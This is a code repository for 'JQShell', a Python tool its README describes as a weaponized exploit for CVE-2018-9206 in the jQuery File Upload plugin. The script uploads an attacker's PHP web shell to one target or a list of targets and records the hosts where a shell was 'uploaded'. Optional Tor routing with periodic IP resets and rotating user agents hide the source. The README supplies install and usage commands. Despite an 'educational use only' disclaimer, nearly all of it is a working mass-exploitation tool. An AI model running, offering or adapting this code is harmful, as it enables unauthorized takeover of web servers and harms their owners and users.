├── README.md ├── __pycache__ └── misc.cpython-36.pyc ├── jqshell.py └── misc.py /README.md: -------------------------------------------------------------------------------- 1 | ![alt text](https://i.imgur.com/Gp4QkiN.png) 2 | 3 | **JQShell** 4 | 5 | A weaponized version of CVE-2018-9206. 6 | 7 | **Disclaimer** 8 | 9 | Using this agianst servers you dont control, is illegal in most countries. 10 | The author claims no responsibility for the actions of those who use this software for illegal purposes. 11 | This software is intended for educational use only. 12 | No servers were illegally pwned in the making of this software. 13 | 14 | **Features** 15 | 16 | *Single Target* 17 | *Multi Target* 18 | *Tor* 19 | 20 | **Prerequisites** 21 | 22 | Please install these required packages. 23 | 24 | **Python3** 25 | 26 | ```shell 27 | pip3 install requests pysocks subprocess stem 28 | ``` 29 | **Tor Control Port** 30 | 31 | To use tor, in this script, you must edit your torrc file and enable tor control port on 9051. 32 | 33 | Typically this file is here: /etc/tor/torrc 34 | 35 | open this file and change this line: 36 | 37 | ```shell 38 | #ControlPort 9051 39 | ``` 40 | 41 | to 42 | 43 | ```shell 44 | ControlPort 9051 45 | ``` 46 | 47 | ```shell 48 | restart tor service 49 | ``` 50 | 51 | **Usage** 52 | 53 | ```shell 54 | usage: jqshell.py [-h] [-l LIST_INIT] [-t SINGLE_TARGET] -s SHELL_LOC 55 | [-o OUTPUTZ] [-tor] 56 | 57 | optional arguments: 58 | -h, --help show this help message and exit 59 | -l LIST_INIT, --list LIST_INIT 60 | Select for a list of assets to exploit 61 | -t SINGLE_TARGET, --target SINGLE_TARGET 62 | Single exploit target 63 | -s SHELL_LOC, --shell SHELL_LOC 64 | This is required, put the fullpath to your shell 65 | -o OUTPUTZ, --output OUTPUTZ 66 | This is full path to were you want to save your list 67 | of confirmed hosts 68 | -tor, --tor_proxy Select if you have tor installed, you will need to 69 | enable control port 70 | ``` 71 | **Examples** 72 | 73 | Running agianst single target. 74 | ```shell 75 | python3 jqshell.py -t http://localhost/folderwerejqueryis -s /var/www/html/shell.php 76 | ``` 77 | Running agianst single target, with saving output. 78 | ```shell 79 | python3 jqshell.py -t https://localhost/folderwerejqueryis -s /var/www/html/shell.php -o pwned.txt 80 | ``` 81 | Running a list, with saving output. 82 | ```shell 83 | python3 jqshell.py -l /opt/jquery/test.txt -s /var/www/html/shell.php -o pwned.txt 84 | ``` 85 | **Author** 86 | 87 | * **Joshua Whitaker** 88 | * *Twitter* [@_Stahlz](https://twitter.com/_Stahlz) 89 | * *Email* - [stahl@stahl.io](stahl@stahl.io) 90 | * *Website* - [stahl.io](http://stahl.io) 91 | 92 | 93 | 94 | -------------------------------------------------------------------------------- /__pycache__/misc.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Stahlz/JQShell/47864118e35b2e9e7e7c0daa8d6996019add0e8f/__pycache__/misc.cpython-36.pyc -------------------------------------------------------------------------------- /jqshell.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import subprocess 3 | import argparse 4 | import sys 5 | from misc import redundant 6 | from misc import colors 7 | 8 | """Author: Joshua Whitaker""" 9 | """Twitter: @_Stahlz""" 10 | """Email: stahl@stahl.io""" 11 | 12 | """Initalizing Classes""" 13 | global initall 14 | initall = redundant() 15 | global colors 16 | initcolor = colors() 17 | 18 | """Misc Vars""" 19 | global write_output 20 | write_output = False 21 | global set_tor_reset_interval 22 | set_tor_reset_interval = 5 23 | global tor_count 24 | tor_count = 0 25 | 26 | art = ( 27 | initcolor.OKGREEN + ' ▄▄▄██▀▀▀█████ ██████ ██░ ██ ▓█████ ██▓ ██▓ ' + initcolor.ENDC + '\n' + 28 | initcolor.OKGREEN + ' ▒██ ▒██▓ ██▒▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒ ' + initcolor.ENDC + '\n' + 29 | initcolor.OKGREEN + ' ░██ ▒██▒ ██░░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░ ' + initcolor.ENDC + '\n' + 30 | initcolor.OKGREEN + '▓██▄██▓░██ █▀ ░ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░ ' + initcolor.ENDC + '\n' + 31 | initcolor.OKGREEN + ' ▓███▒ ░▒███▒█▄ ▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒' + initcolor.ENDC + '\n' + 32 | initcolor.OKGREEN + ' ▒▓▒▒░ ░░ ▒▒░ ▒ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░' + initcolor.ENDC + '\n' + 33 | initcolor.OKGREEN + ' ▒ ░▒░ ░ ▒░ ░ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░' + initcolor.ENDC + '\n' + 34 | initcolor.OKGREEN + ' ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ' + initcolor.ENDC + '\n' + 35 | initcolor.OKGREEN + ' ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░' + initcolor.ENDC + '\n') 36 | print(art) 37 | 38 | print(initcolor.WARNING + 'Using this agianst servers you dont control, is illegal in most countries.' + initcolor.ENDC) 39 | print(initcolor.WARNING + 'The author claims no responsibility for the actions of those who use this software for illegal purposes.' + initcolor.ENDC) 40 | print(initcolor.WARNING + 'This software is intended for educational use only.' + initcolor.ENDC) 41 | 42 | 43 | """Argparse block""" 44 | parser = argparse.ArgumentParser() 45 | parser.add_argument('-l','--list', dest='list_init', required=False, help='Select for a list of assets to exploit') 46 | parser.add_argument('-t','--target', dest='single_target',required=False, help='Single exploit target') 47 | parser.add_argument('-s','--shell', dest='shell_loc', required=True, help='This is required, put the fullpath to your shell') 48 | parser.add_argument('-o','--output', dest='outputz', required=False, help='This is full path to were you want to save your list of confirmed hosts') 49 | parser.add_argument('-tor','--tor_proxy', action='store_true', dest='torproxy', help='Select if you have tor installed, you will need to enable control port', required=False, default=False) 50 | args = parser.parse_args() 51 | 52 | """If Block for exiting if requirements aern't meant""" 53 | if (args.list_init == None) and (args.single_target == None): 54 | print(initcolor.FAIL + '[-] Please select a list -l or -t for single target' + initcolor.ENDC) 55 | sys.exit() 56 | 57 | if (args.list_init != None) and (args.single_target != None): 58 | print(initcolor.FAIL + '[-] Please select either a list or single target, not both' + initcolor.ENDC) 59 | sys.exit() 60 | 61 | if (args.list_init != None) and (args.single_target == None): 62 | with open(args.list_init,'r') as lists: 63 | output = lists.read().splitlines() 64 | 65 | if args.shell_loc == None or '': 66 | print(initcolor.FAIL + '[-] Please put the full path to your shell' + initcolor.ENDC) 67 | sys.exit() 68 | 69 | if args.outputz == None or '': 70 | pass 71 | else: 72 | write_output = True 73 | 74 | if args.torproxy == True: 75 | tor_ps = initall.is_tor_running() 76 | if tor_ps != '' or None: 77 | print(initcolor.OKGREEN + '[*] Tor Proxy Enabled, PID {0}'.format(tor_ps) + initcolor.ENDC) 78 | global proxies 79 | proxies = { 80 | 'http': 'socks5://127.0.0.1:9050', 81 | 'https': 'socks5://127.0.0.1:9050' 82 | } 83 | """Every time the script is run a new ip is requested through the tor control port""" 84 | initall.reset_tor_ip() 85 | print(initcolor.OKGREEN + '[*] Reseting Tor Connection' + initcolor.ENDC) 86 | else: 87 | print(initcolor.FAIL + '[-] Could not find Tor Running, Please Start the Tor Service and re-run' + initcolor.ENDC) 88 | sys.exit() 89 | 90 | 91 | """Session for building concurrency""" 92 | global request 93 | request = requests.Session() 94 | 95 | """Get Shell Name""" 96 | global shell_name 97 | shell_name = initall.shell_name(args.shell_loc) 98 | 99 | """Shell upload to Server""" 100 | global files 101 | files = {'files':('{0}'.format(shell_name), open(args.shell_loc, 'rb'), 'multipart/form-data')} 102 | 103 | def http(domain): 104 | if args.torproxy == True: 105 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, proxies=proxies, headers=initall.random_agent()) 106 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 107 | if upload_shell.status_code == 200: 108 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 109 | if write_output == True: 110 | initall.write_me(args.outputz,shell_location) 111 | elif upload_shell.status_code != 200: 112 | print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 113 | elif args.torproxy == False: 114 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, headers=initall.random_agent()) 115 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 116 | if upload_shell.status_code == 200: 117 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 118 | if write_output == True: 119 | initall.write_me(args.outputz,shell_location) 120 | elif upload_shell.status_code != 200: 121 | print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 122 | 123 | def https(domain): 124 | if args.torproxy == True: 125 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, proxies=proxies, headers=initall.random_agent()) 126 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 127 | if upload_shell.status_code == 200: 128 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 129 | if write_output == True: 130 | initall.write_me(args.outputz,shell_location) 131 | elif upload_shell.status_code != 200: 132 | print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 133 | elif args.torproxy == False: 134 | upload_shell = request.post('{0}/server/php/index.php'.format(domain), files=files, headers=initall.random_agent()) 135 | shell_location = '{0}'.format(domain) + '/server/php/files/' + '{0}'.format(shell_name) 136 | if upload_shell.status_code == 200: 137 | print(initcolor.OKGREEN + '[*] Potential Shell Uploaded, check in: {0}'.format(shell_location) + initcolor.ENDC) 138 | if write_output == True: 139 | initall.write_me(args.outputz,shell_location) 140 | elif upload_shell.status_code != 200: 141 | print(initcolor.FAIL + '[-] Appears the site is not vulnerable: {0}'.format(domain) + initcolor.ENDC) 142 | 143 | """Target Logic""" 144 | if args.single_target != None: 145 | if 'http://' in args.single_target: 146 | http(args.single_target) 147 | elif 'https://' in args.single_target: 148 | https(args.single_target) 149 | else: 150 | domain = 'http://{0}'.format(args.single_target) 151 | http(domain) 152 | elif args.list_init != None: 153 | for domain in output: 154 | if tor_count >= set_tor_reset_interval: 155 | print(initcolor.OKGREEN + '[*] Reseting Tor Connection' + initcolor.ENDC) 156 | initall.reset_tor_ip() 157 | tor_count = 0 158 | if 'http://' in domain: 159 | if args.torproxy == True: 160 | tor_count += 1 161 | http(domain) 162 | elif 'https://' in domain: 163 | if args.torproxy == True: 164 | tor_count += 1 165 | https(domain) 166 | else: 167 | if args.torproxy == True: 168 | tor_count += 1 169 | domain = 'http://{0}'.format(domain) 170 | http(domain) 171 | -------------------------------------------------------------------------------- /misc.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | from random import choice 3 | from stem import Signal 4 | from stem.control import Controller 5 | 6 | class redundant(): 7 | 8 | def __init__(self): 9 | pass 10 | 11 | def reset_tor_ip(self): 12 | with Controller.from_port(port = 9051) as controller: 13 | controller.authenticate() 14 | controller.signal(Signal.NEWNYM) 15 | 16 | def is_tor_running(self): 17 | command = 'ps -ef | grep tor | egrep -v "grep tor" | awk \'{print $2}\'' 18 | psef = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE) 19 | psef = psef.stdout.read().decode('utf-8').strip() 20 | if psef != '' or None: 21 | return psef 22 | else: 23 | return None 24 | 25 | def random_agent(self): 26 | desktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 27 | 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 28 | 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 29 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14', 30 | 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36', 31 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36', 32 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36', 33 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36', 34 | 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36', 35 | 'Mozilla/5.0 (Linux; U; Android-4.0.3; en-us; Galaxy Nexus Build/IML74K) AppleWebKit/535.7 (KHTML, like Gecko) CrMo/16.0.912.75 Mobile Safari/535.7', 36 | 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-N910F Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36', 37 | 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 38 | 'Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N900 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36', 39 | 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G570Y Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36', 40 | 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393', 41 | 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1', 42 | 'Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4', 43 | 'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko', 44 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; MDDCJS)', 45 | 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)', 46 | 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 47 | 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 48 | 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'] 49 | return {'User-Agent': choice(desktop_agents)} 50 | 51 | def write_me(self,output_file,Domain): 52 | with open("{0}".format(output_file), "a") as myfile: 53 | myfile.write('{0}'.format(Domain) + '\n') 54 | 55 | def shell_name(self,fullpath): 56 | if fullpath.endswith('.php'): 57 | elements = fullpath.rsplit('/') 58 | find_php = list(filter(lambda x:'.php' in x, elements)) 59 | php_found = ''.join(find_php) 60 | return php_found 61 | 62 | class colors: 63 | HEADER = '\033[95m' 64 | OKBLUE = '\033[94m' 65 | OKGREEN = '\033[92m' 66 | WARNING = '\033[93m' 67 | FAIL = '\033[91m' 68 | ENDC = '\033[0m' 69 | BOLD = '\033[1m' 70 | UNDERLINE = '\033[4m' 71 | --------------------------------------------------------------------------------